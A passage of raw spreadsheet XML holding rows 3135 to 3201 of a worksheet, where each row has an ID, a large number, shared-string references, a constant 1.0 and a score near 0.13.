      <c r="A3135" s="1">
        <v>6694.0</v>
      </c>
      <c r="B3135" s="2">
        <v>4.9191443E7</v>
      </c>
      <c r="C3135" s="2" t="s">
        <v>2943</v>
      </c>
      <c r="D3135" s="2">
        <v>1.0</v>
      </c>
      <c r="E3135" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3135" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3136" ht="15.75" customHeight="1">
      <c r="A3136" s="1">
        <v>7195.0</v>
      </c>
      <c r="B3136" s="2">
        <v>5.0576962E7</v>
      </c>
      <c r="C3136" s="2" t="s">
        <v>2944</v>
      </c>
      <c r="D3136" s="2">
        <v>1.0</v>
      </c>
      <c r="E3136" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3136" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3137" ht="15.75" customHeight="1">
      <c r="A3137" s="1">
        <v>7309.0</v>
      </c>
      <c r="B3137" s="2">
        <v>5.0854561E7</v>
      </c>
      <c r="C3137" s="2" t="s">
        <v>2945</v>
      </c>
      <c r="D3137" s="2">
        <v>1.0</v>
      </c>
      <c r="E3137" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3137" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3138" ht="15.75" customHeight="1">
      <c r="A3138" s="1">
        <v>7493.0</v>
      </c>
      <c r="B3138" s="2">
        <v>5.1376948E7</v>
      </c>
      <c r="C3138" s="2" t="s">
        <v>2946</v>
      </c>
      <c r="D3138" s="2">
        <v>1.0</v>
      </c>
      <c r="E3138" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3138" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3139" ht="15.75" customHeight="1">
      <c r="A3139" s="1">
        <v>8059.0</v>
      </c>
      <c r="B3139" s="2">
        <v>5.2919389E7</v>
      </c>
      <c r="C3139" s="2" t="s">
        <v>2947</v>
      </c>
      <c r="D3139" s="2">
        <v>1.0</v>
      </c>
      <c r="E3139" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3139" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3140" ht="15.75" customHeight="1">
      <c r="A3140" s="1">
        <v>9020.0</v>
      </c>
      <c r="B3140" s="2">
        <v>5.5004923E7</v>
      </c>
      <c r="C3140" s="2" t="s">
        <v>2948</v>
      </c>
      <c r="D3140" s="2">
        <v>1.0</v>
      </c>
      <c r="E3140" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3140" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3141" ht="15.75" customHeight="1">
      <c r="A3141" s="1">
        <v>9409.0</v>
      </c>
      <c r="B3141" s="2">
        <v>5.5773154E7</v>
      </c>
      <c r="C3141" s="2" t="s">
        <v>2949</v>
      </c>
      <c r="D3141" s="2">
        <v>1.0</v>
      </c>
      <c r="E3141" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3141" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3142" ht="15.75" customHeight="1">
      <c r="A3142" s="1">
        <v>9591.0</v>
      </c>
      <c r="B3142" s="2">
        <v>5.6102941E7</v>
      </c>
      <c r="C3142" s="2" t="s">
        <v>2950</v>
      </c>
      <c r="D3142" s="2">
        <v>1.0</v>
      </c>
      <c r="E3142" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3142" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3143" ht="15.75" customHeight="1">
      <c r="A3143" s="1">
        <v>9968.0</v>
      </c>
      <c r="B3143" s="2">
        <v>5.6941682E7</v>
      </c>
      <c r="C3143" s="2" t="s">
        <v>2951</v>
      </c>
      <c r="D3143" s="2">
        <v>1.0</v>
      </c>
      <c r="E3143" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3143" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3144" ht="15.75" customHeight="1">
      <c r="A3144" s="1">
        <v>10534.0</v>
      </c>
      <c r="B3144" s="2">
        <v>1.2354537E7</v>
      </c>
      <c r="C3144" s="2" t="s">
        <v>2952</v>
      </c>
      <c r="D3144" s="2">
        <v>1.0</v>
      </c>
      <c r="E3144" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3144" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3145" ht="15.75" customHeight="1">
      <c r="A3145" s="1">
        <v>10966.0</v>
      </c>
      <c r="B3145" s="2">
        <v>1.7241134E7</v>
      </c>
      <c r="C3145" s="2" t="s">
        <v>2953</v>
      </c>
      <c r="D3145" s="2">
        <v>1.0</v>
      </c>
      <c r="E3145" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3145" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3146" ht="15.75" customHeight="1">
      <c r="A3146" s="1">
        <v>11565.0</v>
      </c>
      <c r="B3146" s="2">
        <v>2.2749573E7</v>
      </c>
      <c r="C3146" s="2" t="s">
        <v>2954</v>
      </c>
      <c r="D3146" s="2">
        <v>1.0</v>
      </c>
      <c r="E3146" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3146" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3147" ht="15.75" customHeight="1">
      <c r="A3147" s="1">
        <v>11612.0</v>
      </c>
      <c r="B3147" s="2">
        <v>2.3040877E7</v>
      </c>
      <c r="C3147" s="2" t="s">
        <v>2955</v>
      </c>
      <c r="D3147" s="2">
        <v>1.0</v>
      </c>
      <c r="E3147" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3147" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3148" ht="15.75" customHeight="1">
      <c r="A3148" s="1">
        <v>12257.0</v>
      </c>
      <c r="B3148" s="2">
        <v>2.7983449E7</v>
      </c>
      <c r="C3148" s="2" t="s">
        <v>2956</v>
      </c>
      <c r="D3148" s="2">
        <v>1.0</v>
      </c>
      <c r="E3148" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3148" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3149" ht="15.75" customHeight="1">
      <c r="A3149" s="1">
        <v>13811.0</v>
      </c>
      <c r="B3149" s="2">
        <v>3.6669791E7</v>
      </c>
      <c r="C3149" s="2" t="s">
        <v>2957</v>
      </c>
      <c r="D3149" s="2">
        <v>1.0</v>
      </c>
      <c r="E3149" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3149" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3150" ht="15.75" customHeight="1">
      <c r="A3150" s="1">
        <v>15428.0</v>
      </c>
      <c r="B3150" s="2">
        <v>4.2932932E7</v>
      </c>
      <c r="C3150" s="2" t="s">
        <v>2958</v>
      </c>
      <c r="D3150" s="2">
        <v>1.0</v>
      </c>
      <c r="E3150" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3150" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3151" ht="15.75" customHeight="1">
      <c r="A3151" s="1">
        <v>16688.0</v>
      </c>
      <c r="B3151" s="2">
        <v>4.7323207E7</v>
      </c>
      <c r="C3151" s="2" t="s">
        <v>2959</v>
      </c>
      <c r="D3151" s="2">
        <v>1.0</v>
      </c>
      <c r="E3151" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3151" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3152" ht="15.75" customHeight="1">
      <c r="A3152" s="1">
        <v>17073.0</v>
      </c>
      <c r="B3152" s="2">
        <v>4.8593225E7</v>
      </c>
      <c r="C3152" s="2" t="s">
        <v>2960</v>
      </c>
      <c r="D3152" s="2">
        <v>1.0</v>
      </c>
      <c r="E3152" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3152" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3153" ht="15.75" customHeight="1">
      <c r="A3153" s="1">
        <v>18559.0</v>
      </c>
      <c r="B3153" s="2">
        <v>5.3172068E7</v>
      </c>
      <c r="C3153" s="2" t="s">
        <v>2961</v>
      </c>
      <c r="D3153" s="2">
        <v>1.0</v>
      </c>
      <c r="E3153" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3153" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3154" ht="15.75" customHeight="1">
      <c r="A3154" s="1">
        <v>18953.0</v>
      </c>
      <c r="B3154" s="2">
        <v>5.4351657E7</v>
      </c>
      <c r="C3154" s="2" t="s">
        <v>2962</v>
      </c>
      <c r="D3154" s="2">
        <v>1.0</v>
      </c>
      <c r="E3154" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3154" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3155" ht="15.75" customHeight="1">
      <c r="A3155" s="1">
        <v>27144.0</v>
      </c>
      <c r="B3155" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C3155" s="2" t="s">
        <v>2963</v>
      </c>
      <c r="D3155" s="2">
        <v>1.0</v>
      </c>
      <c r="E3155" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3155" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3156" ht="15.75" customHeight="1">
      <c r="A3156" s="1">
        <v>27202.0</v>
      </c>
      <c r="B3156" s="2">
        <v>2.0942222E7</v>
      </c>
      <c r="C3156" s="2" t="s">
        <v>2964</v>
      </c>
      <c r="D3156" s="2">
        <v>1.0</v>
      </c>
      <c r="E3156" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3156" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3157" ht="15.75" customHeight="1">
      <c r="A3157" s="1">
        <v>27582.0</v>
      </c>
      <c r="B3157" s="2">
        <v>2.2527045E7</v>
      </c>
      <c r="C3157" s="2" t="s">
        <v>2965</v>
      </c>
      <c r="D3157" s="2">
        <v>1.0</v>
      </c>
      <c r="E3157" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3157" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3158" ht="15.75" customHeight="1">
      <c r="A3158" s="1">
        <v>29470.0</v>
      </c>
      <c r="B3158" s="2">
        <v>3.2364429E7</v>
      </c>
      <c r="C3158" s="2" t="s">
        <v>2966</v>
      </c>
      <c r="D3158" s="2">
        <v>1.0</v>
      </c>
      <c r="E3158" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3158" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3159" ht="15.75" customHeight="1">
      <c r="A3159" s="1">
        <v>3318.0</v>
      </c>
      <c r="B3159" s="2">
        <v>3.7631792E7</v>
      </c>
      <c r="C3159" s="2" t="s">
        <v>2967</v>
      </c>
      <c r="D3159" s="2">
        <v>1.0</v>
      </c>
      <c r="E3159" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3159" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="3160" ht="15.75" customHeight="1">
      <c r="A3160" s="1">
        <v>5264.0</v>
      </c>
      <c r="B3160" s="2">
        <v>4.5140906E7</v>
      </c>
      <c r="C3160" s="2" t="s">
        <v>2968</v>
      </c>
      <c r="D3160" s="2">
        <v>1.0</v>
      </c>
      <c r="E3160" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3160" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="3161" ht="15.75" customHeight="1">
      <c r="A3161" s="1">
        <v>10124.0</v>
      </c>
      <c r="B3161" s="2">
        <v>5.7278782E7</v>
      </c>
      <c r="C3161" s="2" t="s">
        <v>2969</v>
      </c>
      <c r="D3161" s="2">
        <v>1.0</v>
      </c>
      <c r="E3161" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3161" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="3162" ht="15.75" customHeight="1">
      <c r="A3162" s="1">
        <v>131.0</v>
      </c>
      <c r="B3162" s="2">
        <v>1.3269459E7</v>
      </c>
      <c r="C3162" s="2" t="s">
        <v>2970</v>
      </c>
      <c r="D3162" s="2">
        <v>1.0</v>
      </c>
      <c r="E3162" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3162" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="3163" ht="15.75" customHeight="1">
      <c r="A3163" s="1">
        <v>7744.0</v>
      </c>
      <c r="B3163" s="2">
        <v>5.2057658E7</v>
      </c>
      <c r="C3163" s="2" t="s">
        <v>2971</v>
      </c>
      <c r="D3163" s="2">
        <v>1.0</v>
      </c>
      <c r="E3163" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3163" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="3164" ht="15.75" customHeight="1">
      <c r="A3164" s="1">
        <v>3960.0</v>
      </c>
      <c r="B3164" s="2">
        <v>4.0709564E7</v>
      </c>
      <c r="C3164" s="2" t="s">
        <v>2972</v>
      </c>
      <c r="D3164" s="2">
        <v>1.0</v>
      </c>
      <c r="E3164" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3164" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="3165" ht="15.75" customHeight="1">
      <c r="A3165" s="1">
        <v>4752.0</v>
      </c>
      <c r="B3165" s="2">
        <v>4.3394701E7</v>
      </c>
      <c r="C3165" s="2" t="s">
        <v>2973</v>
      </c>
      <c r="D3165" s="2">
        <v>1.0</v>
      </c>
      <c r="E3165" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3165" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="3166" ht="15.75" customHeight="1">
      <c r="A3166" s="1">
        <v>11185.0</v>
      </c>
      <c r="B3166" s="2">
        <v>1.9765517E7</v>
      </c>
      <c r="C3166" s="2" t="s">
        <v>2974</v>
      </c>
      <c r="D3166" s="2">
        <v>1.0</v>
      </c>
      <c r="E3166" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3166" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="3167" ht="15.75" customHeight="1">
      <c r="A3167" s="1">
        <v>9592.0</v>
      </c>
      <c r="B3167" s="2">
        <v>5.6110563E7</v>
      </c>
      <c r="C3167" s="2" t="s">
        <v>2975</v>
      </c>
      <c r="D3167" s="2">
        <v>1.0</v>
      </c>
      <c r="E3167" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3167" s="2">
        <v>0.1298449612403101</v>
      </c>
    </row>
    <row r="3168" ht="15.75" customHeight="1">
      <c r="A3168" s="1">
        <v>8576.0</v>
      </c>
      <c r="B3168" s="2">
        <v>5.4212289E7</v>
      </c>
      <c r="C3168" s="2" t="s">
        <v>2976</v>
      </c>
      <c r="D3168" s="2">
        <v>1.0</v>
      </c>
      <c r="E3168" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3168" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3169" ht="15.75" customHeight="1">
      <c r="A3169" s="1">
        <v>8769.0</v>
      </c>
      <c r="B3169" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C3169" s="2" t="s">
        <v>2977</v>
      </c>
      <c r="D3169" s="2">
        <v>1.0</v>
      </c>
      <c r="E3169" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3169" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3170" ht="15.75" customHeight="1">
      <c r="A3170" s="1">
        <v>8981.0</v>
      </c>
      <c r="B3170" s="2">
        <v>5.496181E7</v>
      </c>
      <c r="C3170" s="2" t="s">
        <v>2978</v>
      </c>
      <c r="D3170" s="2">
        <v>1.0</v>
      </c>
      <c r="E3170" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3170" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3171" ht="15.75" customHeight="1">
      <c r="A3171" s="1">
        <v>10368.0</v>
      </c>
      <c r="B3171" s="2">
        <v>7946216.0</v>
      </c>
      <c r="C3171" s="2" t="s">
        <v>2979</v>
      </c>
      <c r="D3171" s="2">
        <v>1.0</v>
      </c>
      <c r="E3171" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3171" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3172" ht="15.75" customHeight="1">
      <c r="A3172" s="1">
        <v>15401.0</v>
      </c>
      <c r="B3172" s="2">
        <v>4.283279E7</v>
      </c>
      <c r="C3172" s="2" t="s">
        <v>2980</v>
      </c>
      <c r="D3172" s="2">
        <v>1.0</v>
      </c>
      <c r="E3172" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3172" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3173" ht="15.75" customHeight="1">
      <c r="A3173" s="1">
        <v>16633.0</v>
      </c>
      <c r="B3173" s="2">
        <v>4.7100305E7</v>
      </c>
      <c r="C3173" s="2" t="s">
        <v>2981</v>
      </c>
      <c r="D3173" s="2">
        <v>1.0</v>
      </c>
      <c r="E3173" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3173" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="3174" ht="15.75" customHeight="1">
      <c r="A3174" s="1">
        <v>15533.0</v>
      </c>
      <c r="B3174" s="2">
        <v>4.3317754E7</v>
      </c>
      <c r="C3174" s="2" t="s">
        <v>2982</v>
      </c>
      <c r="D3174" s="2">
        <v>1.0</v>
      </c>
      <c r="E3174" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3174" s="2">
        <v>0.1293650793650794</v>
      </c>
    </row>
    <row r="3175" ht="15.75" customHeight="1">
      <c r="A3175" s="1">
        <v>9604.0</v>
      </c>
      <c r="B3175" s="2">
        <v>5.6155499E7</v>
      </c>
      <c r="C3175" s="2" t="s">
        <v>2983</v>
      </c>
      <c r="D3175" s="2">
        <v>1.0</v>
      </c>
      <c r="E3175" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3175" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="3176" ht="15.75" customHeight="1">
      <c r="A3176" s="1">
        <v>12327.0</v>
      </c>
      <c r="B3176" s="2">
        <v>2.8521218E7</v>
      </c>
      <c r="C3176" s="2" t="s">
        <v>2984</v>
      </c>
      <c r="D3176" s="2">
        <v>1.0</v>
      </c>
      <c r="E3176" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3176" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="3177" ht="15.75" customHeight="1">
      <c r="A3177" s="1">
        <v>3875.0</v>
      </c>
      <c r="B3177" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C3177" s="2" t="s">
        <v>2985</v>
      </c>
      <c r="D3177" s="2">
        <v>1.0</v>
      </c>
      <c r="E3177" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3177" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="3178" ht="15.75" customHeight="1">
      <c r="A3178" s="1">
        <v>7532.0</v>
      </c>
      <c r="B3178" s="2">
        <v>5.1466401E7</v>
      </c>
      <c r="C3178" s="2" t="s">
        <v>2986</v>
      </c>
      <c r="D3178" s="2">
        <v>1.0</v>
      </c>
      <c r="E3178" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3178" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="3179" ht="15.75" customHeight="1">
      <c r="A3179" s="1">
        <v>12358.0</v>
      </c>
      <c r="B3179" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C3179" s="2" t="s">
        <v>2987</v>
      </c>
      <c r="D3179" s="2">
        <v>1.0</v>
      </c>
      <c r="E3179" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3179" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="3180" ht="15.75" customHeight="1">
      <c r="A3180" s="1">
        <v>4451.0</v>
      </c>
      <c r="B3180" s="2">
        <v>4.2403036E7</v>
      </c>
      <c r="C3180" s="2" t="s">
        <v>2988</v>
      </c>
      <c r="D3180" s="2">
        <v>1.0</v>
      </c>
      <c r="E3180" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3180" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="3181" ht="15.75" customHeight="1">
      <c r="A3181" s="1">
        <v>11031.0</v>
      </c>
      <c r="B3181" s="2">
        <v>1.7968383E7</v>
      </c>
      <c r="C3181" s="2" t="s">
        <v>2989</v>
      </c>
      <c r="D3181" s="2">
        <v>1.0</v>
      </c>
      <c r="E3181" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3181" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="3182" ht="15.75" customHeight="1">
      <c r="A3182" s="1">
        <v>16441.0</v>
      </c>
      <c r="B3182" s="2">
        <v>4.6383901E7</v>
      </c>
      <c r="C3182" s="2" t="s">
        <v>2990</v>
      </c>
      <c r="D3182" s="2">
        <v>1.0</v>
      </c>
      <c r="E3182" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3182" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="3183" ht="15.75" customHeight="1">
      <c r="A3183" s="1">
        <v>24323.0</v>
      </c>
      <c r="B3183" s="2">
        <v>1.0641134E7</v>
      </c>
      <c r="C3183" s="2" t="s">
        <v>2991</v>
      </c>
      <c r="D3183" s="2">
        <v>1.0</v>
      </c>
      <c r="E3183" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3183" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="3184" ht="15.75" customHeight="1">
      <c r="A3184" s="1">
        <v>11723.0</v>
      </c>
      <c r="B3184" s="2">
        <v>2.3882543E7</v>
      </c>
      <c r="C3184" s="2" t="s">
        <v>2992</v>
      </c>
      <c r="D3184" s="2">
        <v>1.0</v>
      </c>
      <c r="E3184" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3184" s="2">
        <v>0.1289308176100629</v>
      </c>
    </row>
    <row r="3185" ht="15.75" customHeight="1">
      <c r="A3185" s="1">
        <v>20059.0</v>
      </c>
      <c r="B3185" s="2">
        <v>8377466.0</v>
      </c>
      <c r="C3185" s="2" t="s">
        <v>2993</v>
      </c>
      <c r="D3185" s="2">
        <v>1.0</v>
      </c>
      <c r="E3185" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3185" s="2">
        <v>0.1289308176100629</v>
      </c>
    </row>
    <row r="3186" ht="15.75" customHeight="1">
      <c r="A3186" s="1">
        <v>4264.0</v>
      </c>
      <c r="B3186" s="2">
        <v>4.1848227E7</v>
      </c>
      <c r="C3186" s="2" t="s">
        <v>2994</v>
      </c>
      <c r="D3186" s="2">
        <v>1.0</v>
      </c>
      <c r="E3186" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3186" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="3187" ht="15.75" customHeight="1">
      <c r="A3187" s="1">
        <v>4741.0</v>
      </c>
      <c r="B3187" s="2">
        <v>4.3362709E7</v>
      </c>
      <c r="C3187" s="2" t="s">
        <v>2995</v>
      </c>
      <c r="D3187" s="2">
        <v>1.0</v>
      </c>
      <c r="E3187" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3187" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="3188" ht="15.75" customHeight="1">
      <c r="A3188" s="1">
        <v>10403.0</v>
      </c>
      <c r="B3188" s="2">
        <v>9653692.0</v>
      </c>
      <c r="C3188" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="D3188" s="2">
        <v>1.0</v>
      </c>
      <c r="E3188" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3188" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="3189" ht="15.75" customHeight="1">
      <c r="A3189" s="1">
        <v>14421.0</v>
      </c>
      <c r="B3189" s="2">
        <v>3.9251786E7</v>
      </c>
      <c r="C3189" s="2" t="s">
        <v>2997</v>
      </c>
      <c r="D3189" s="2">
        <v>1.0</v>
      </c>
      <c r="E3189" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3189" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="3190" ht="15.75" customHeight="1">
      <c r="A3190" s="1">
        <v>17732.0</v>
      </c>
      <c r="B3190" s="2">
        <v>5.0671556E7</v>
      </c>
      <c r="C3190" s="2" t="s">
        <v>2998</v>
      </c>
      <c r="D3190" s="2">
        <v>1.0</v>
      </c>
      <c r="E3190" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3190" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="3191" ht="15.75" customHeight="1">
      <c r="A3191" s="1">
        <v>17759.0</v>
      </c>
      <c r="B3191" s="2">
        <v>5.0729294E7</v>
      </c>
      <c r="C3191" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="D3191" s="2">
        <v>1.0</v>
      </c>
      <c r="E3191" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3191" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="3192" ht="15.75" customHeight="1">
      <c r="A3192" s="1">
        <v>20083.0</v>
      </c>
      <c r="B3192" s="2">
        <v>9296417.0</v>
      </c>
      <c r="C3192" s="2" t="s">
        <v>3000</v>
      </c>
      <c r="D3192" s="2">
        <v>1.0</v>
      </c>
      <c r="E3192" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3192" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="3193" ht="15.75" customHeight="1">
      <c r="A3193" s="1">
        <v>2936.0</v>
      </c>
      <c r="B3193" s="2">
        <v>3.5950592E7</v>
      </c>
      <c r="C3193" s="2" t="s">
        <v>3001</v>
      </c>
      <c r="D3193" s="2">
        <v>1.0</v>
      </c>
      <c r="E3193" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3193" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="3194" ht="15.75" customHeight="1">
      <c r="A3194" s="1">
        <v>7094.0</v>
      </c>
      <c r="B3194" s="2">
        <v>5.0308061E7</v>
      </c>
      <c r="C3194" s="2" t="s">
        <v>3002</v>
      </c>
      <c r="D3194" s="2">
        <v>1.0</v>
      </c>
      <c r="E3194" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3194" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="3195" ht="15.75" customHeight="1">
      <c r="A3195" s="1">
        <v>12949.0</v>
      </c>
      <c r="B3195" s="2">
        <v>3.2384188E7</v>
      </c>
      <c r="C3195" s="2" t="s">
        <v>3003</v>
      </c>
      <c r="D3195" s="2">
        <v>1.0</v>
      </c>
      <c r="E3195" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3195" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="3196" ht="15.75" customHeight="1">
      <c r="A3196" s="1">
        <v>13426.0</v>
      </c>
      <c r="B3196" s="2">
        <v>3.5082561E7</v>
      </c>
      <c r="C3196" s="2" t="s">
        <v>3004</v>
      </c>
      <c r="D3196" s="2">
        <v>1.0</v>
      </c>
      <c r="E3196" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3196" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="3197" ht="15.75" customHeight="1">
      <c r="A3197" s="1">
        <v>30494.0</v>
      </c>
      <c r="B3197" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C3197" s="2" t="s">
        <v>3005</v>
      </c>
      <c r="D3197" s="2">
        <v>1.0</v>
      </c>
      <c r="E3197" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3197" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="3198" ht="15.75" customHeight="1">
      <c r="A3198" s="1">
        <v>9212.0</v>
      </c>
      <c r="B3198" s="2">
        <v>5.541986E7</v>
      </c>
      <c r="C3198" s="2" t="s">
        <v>3006</v>
      </c>
      <c r="D3198" s="2">
        <v>1.0</v>
      </c>
      <c r="E3198" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3198" s="2">
        <v>0.1283783783783784</v>
      </c>
    </row>
    <row r="3199" ht="15.75" customHeight="1">
      <c r="A3199" s="1">
        <v>7828.0</v>
      </c>
      <c r="B3199" s="2">
        <v>5.2312676E7</v>
      </c>
      <c r="C3199" s="2" t="s">
        <v>3007</v>
      </c>
      <c r="D3199" s="2">
        <v>1.0</v>
      </c>
      <c r="E3199" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3199" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="3200" ht="15.75" customHeight="1">
      <c r="A3200" s="1">
        <v>3563.0</v>
      </c>
      <c r="B3200" s="2">
        <v>3.8869296E7</v>
      </c>
      <c r="C3200" s="2" t="s">
        <v>3008</v>
      </c>
      <c r="D3200" s="2">
        <v>1.0</v>
      </c>
      <c r="E3200" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3200" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="3201" ht="15.75" customHeight="1">
      <c r="A3201" s="1">
        <v>4176.0</v>
      </c>
      <c r="B3201" s="2">
        <v>4.1554532E7</v>
      </c>
      <c r="C3201" s="2" t="s">
        <v>3009</v>
      </c>
      <c r="D3201" s="2">
        <v>1.0</v>
      </c>
      <c r="E3201" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3201" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="3202" ht="15.75" customHeight="1">
